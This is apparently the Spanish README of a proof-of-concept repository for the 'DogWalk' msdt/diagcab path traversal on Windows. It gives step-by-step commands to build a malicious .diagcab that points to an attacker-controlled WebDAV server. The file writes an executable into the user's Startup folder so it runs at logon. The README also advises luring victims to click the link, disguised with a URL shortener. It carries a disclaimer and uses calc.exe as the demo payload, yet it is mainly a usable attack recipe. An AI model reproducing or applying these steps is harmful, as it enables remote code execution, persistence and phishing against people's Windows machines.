
🐾Dogwalk PoC (usando el archivo diagcab para obtener RCE en Windows)
🚨 Descargo de responsabilidad 🚨
El PoC permite a un atacante lograr Inyección remota de código en un dispositivo Windows de la víctima.
El objetivo de este repositorio es hacer que el PoC sea aún más utilizable que el <a href=https://github.com/irsl/microsoft-diagcab-rce-poc>repositorio inicial.
¡NO LO USES SIN AUTORIZACIÓN PREVIA!
En cuanto al daño causado y a la simplicidad de la explotación,espero que Microsoft lo arregle
Actualización julio de 2022: Microsoft aún no ha parcheado la vulnerabilidad en msdt, pero Microsoft Defender puede detectarla
Concepto principal: vulnerabilidad de path traversal en la tecnología Diagcab de Microsoft (msdt) que podría conducir a la ejecución remota de código.
Puedes encontrar el aviso completo en la publicación del blog
La vulnerabilidad ha sido reportada durante 2 años (por @irsl) y ¡sigue sin solución!
La prueba de concepto configura un servidor webdav que aloja un archivo .diagcab malicioso que realizará un path traversal para escribir un ejecutable malicioso en C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup. Escribir un ejecutable en esta carpeta hará que se ejecute cada vez que el usuario inicie la máquina Windows; esto se denomina Boot Logon Autostart Execution.
Entonces, básicamente lo que necesitamos es:
.diagcab malicioso.diagcab(💡 usa la cabecera de respuesta Content-type: application/octet-stream para que el navegador descargue automáticamente el archivo al visitar la url)
Si eres demasiado perezoso (o tienes prisa) para seguir los pasos uno a uno:
./hurry-dogwalk.sh [WEBDAV_URL] # need docker
# Stop the server
./hurry-dogwalk.sh --clean
De lo contrario ↓↓
.diagcab.diagcfg son simples archivos XML que contienen referencias a uno o más paquetes de diagnóstico y proporcionan metainformación sobre ellos..diagcab.Primero, construye custom.diagcfg:
./build-malicious-diagcfg.sh --url [WEBDAV_URL]
Y construye el hotfix895214.diagcab:
cabarc.exe n hotfix895214.diagcab custom.diagcfg
# run it on windows (or with wine). If you do not find carbarc.exe use http://jc.bellamy.free.fr/download/cabarc.exe or http://download.microsoft.com/download/platformsdk/cab/2.0/w98nt42kmexp/en-us/Cabsdk.exe
Por último, muévelo al directorio ./webdav/diagcab-webdav-poc/config
Coloca el ejecutable que quieras transferir a la máquina de la víctima dentro del directorio ./webdav/malicious... (Aquí usamos el clásico calc.exe)
...Y lanza el servidor:
cd ./webdav/diagcab-webdav-poc/
perl diagcab-webdav-poc.pl
El .diagcab malicioso está disponible en https://[WEBDAV_URL]/config/hotfix895214.diagcab. Ahora tienes que atraer a una víctima para que haga clic en este enlace.
(💡puedes usar un acortador de URL para que parezca menos sospechoso)
🐾🐾
